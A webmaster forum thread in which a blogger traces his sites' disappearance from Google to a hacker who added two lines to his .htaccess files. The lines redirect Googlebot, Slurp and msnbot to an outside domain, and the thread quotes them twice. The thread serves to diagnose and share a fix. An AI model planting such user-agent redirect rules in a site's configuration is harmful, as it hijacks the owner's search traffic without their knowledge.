Google hates my server

Status
Not open for further replies.

grandad

My site Head Rambles has been running for the best part of two and a half years now.

Naturally, if you Google "head rambles" it just about fills the first page. Or it used to.

Now it has vanished off the radar almost entirely, and barely makes the front page.

Other blogs on the same server are suffering from the same vanishing trick.

Anyone any ideas as to what might be going on?

louie

First it looks to me like you lost the "home page" from the index.
One cause of this could be the "sitemap" submitted to Google Webmaster, which doesn't include the home page.

Try trimming down the home page content - sometimes it gets too large and heavy on the content, making the page loading slower than usual.

I don't think it has anything to do with the server itself, unless it was down when Google knocked at the "door"...

grandad

I have just manually regenerated the sitemap including the homepage and submitted it. Nothing has changed in the settings for that, so I don't think that is the problem.

Again, the front page content is, if anything, shorter than in the past. Another blogger who shares the same server is also missing from Google and he only displays one post at a time.

The search should throw the site up as #1 even on G.com. It is #2 in G.ie [and should be #1], but do you see the date? That post went up on the 8th of July last.

Weird?

link8r

The search should throw the site up as #1 even on G.com. It is #2 in G.ie [and should be #1], but do you see the date? That post went up on the 8th of July last.

Weird?

Can you post some screenshots, as I said it's showing number 1 for me. re-submitting your sitemap probably won't do anything

louie

Do you have a webmaster account?
Have a look for any errors (e.g. duplicated page title [lots of them], etc...) or messages...

louie

Do you need all the links tracker?
Slows down the website big time. Any click on the page seems to take seconds to react...

grandad

Yup. Have full root access.

The logs show up nothing and there possibly one or two duplicates but that is all.

This grab is an extract from Woopra [last 30 days] with the x-axis exaggerated. You can see how it tails off to a virtual flat line.

louie

static.woopra.com
google-analytics.com
track2.mybloglog.com
tracker.icerocket.com
izearanks.com

than again
static.woopra.com

grandad

I think I finally discovered what is going on.

Somehow a hacker got into my .htaccess files [which were all set to 644] and added just two lines.
Code:
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://doormoney.biz/ [R=301,L]
It seems that Google never actually gets to the real stuff, as it is fooled into spidering that other site instead.

DrAnte

My site Head Rambles has been running for the best part of two and a half years now.

Naturally, if you Google "head rambles" it just about fills the first page. Or it used to.

Now it has vanished off the radar almost entirely, and barely makes the front page.

Other blogs on the same server are suffering from the same vanishing trick.

Anyone any ideas as to what might be going on?

Server is not reason fot this except your server is usually down. Google do not check where is your server, which hosting company...

writie

I think I finally discovered what is going on.

Somehow a hacker got into my .htaccess files [which were all set to 644] and added just two lines.
Code:
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://doormoney.biz/ [R=301,L]
It seems that Google never actually gets to the real stuff, as it is fooled into spidering that other site instead.
Wow. I just discovered one of the site I work with had the same problem and you've given me the solution.

Thanks.

Michael

Status
Not open for further replies.